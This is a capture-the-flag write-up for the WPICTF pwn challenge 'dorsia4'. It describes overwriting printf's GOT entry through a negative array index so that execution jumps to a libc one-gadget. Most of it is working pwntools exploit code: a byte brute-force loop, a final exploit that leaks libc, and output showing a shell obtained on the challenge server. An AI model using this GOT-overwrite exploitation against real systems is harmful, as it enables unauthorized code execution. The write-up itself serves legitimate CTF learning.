Rating: 5.0
# dorsia4
by mito
## 5 solves, 400 pts
* We can overwrite GOT by entering a negative number for i, since it’s partial RELRO.
* We considered rewriting GOT of printf to One-gadget RCE because scanf is necessary for input.
* By directly rewriting printf's GOT using gdb, We found that out of the three One-gadget RCE (0x4f2c5, 0x4f322, 0x10a38c), only 0x4f322 was effective.
* First, we searched for ROP gadget that changed 1 byte from the address of printf and ran it, but all of them had Segmentation fault.
* Next, by changing the GOT of printf by brute force in 1-byte, we were able to identify multiple bytes where segmentation fault did not occur. Using the python code shown below.
from pwn import *
context.log_level = 'debug'
BINARY = "./nanowrite"
for i in range(0x0, 0x100):
s = process(BINARY)
s.sendline("-103 " + hex(i)[2:])
By trial and error for about 1 hour, we was lucky enough to find the procedure for setting the lowest byte to 0x22.
s.sendline("-103 " + "91")
s.sendline("-102 " + "b0")
s.sendline("-103 " + "38")
s.sendline("-104 " + "22") ← 0 byte
After another 30 minutes of trial and error, we was able to find a procedure to change to 0xa33322 of One-gadget RCE(0x7ffff7a33322 with ASLR disabled).
s.sendline("-103 " + "91")
s.sendline("-102 " + "b0")
s.sendline("-103 " + "38")
s.sendline("-104 " + "22") ← 0 byte
s.sendline("-102 " + "b7")
s.sendline("-103 " + "33") ← 1 byte
s.sendline("-102 " + "a3") ← 2 byte
The final exploit code is below.
from pwn import *
context(os='linux', arch='amd64')
#context.log_level = 'debug'
BINARY = "./nanowrite"
if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = "dorsia4.wpictf.xyz"
PORT = 31337
s = remote(HOST, PORT)
s = process(BINARY)
r = s.recvuntil(" ")[:-1]
libc_leak = int(r, 16)
libc_base = libc_leak - 0x10a38c
gadget_offset = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = libc_base + gadget_offset[1]
print "libc_leak =", hex(libc_leak)
print "libc_base =", hex(libc_base)
print "one_gadget =", hex(one_gadget)
s.sendline("-103 " + hex(((libc_base>>8)&0xff)-0x40+0x91)[2:])
s.sendline("-102 " + hex(((libc_base>>16)&0xff)-0x9e+0xb0)[2:])
s.sendline("-103 " + hex(((libc_base>>8)&0xff)-0x40+0x38)[2:])
s.sendline("-104 " + "22")
s.sendline("-102 " + hex(((libc_base>>16)&0xff)-0x9e+0xb7)[2:])
s.sendline("-103 " + hex(((libc_base>>8)&0xff)-0x40+0x33)[2:])
s.sendline("-102 " + hex(((libc_base>>16)&0xff)-0x9e+0xa3)[2:])
$ python exploit.py r
[+] Opening connection to dorsia4.wpictf.xyz on port 31337: Done
libc_leak = 0x7824c97d438c
libc_base = 0x7824c96ca000
one_gadget = 0x7824c9719322
[*] Switching to interactive mode
giv i b
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
$ cat flag.txt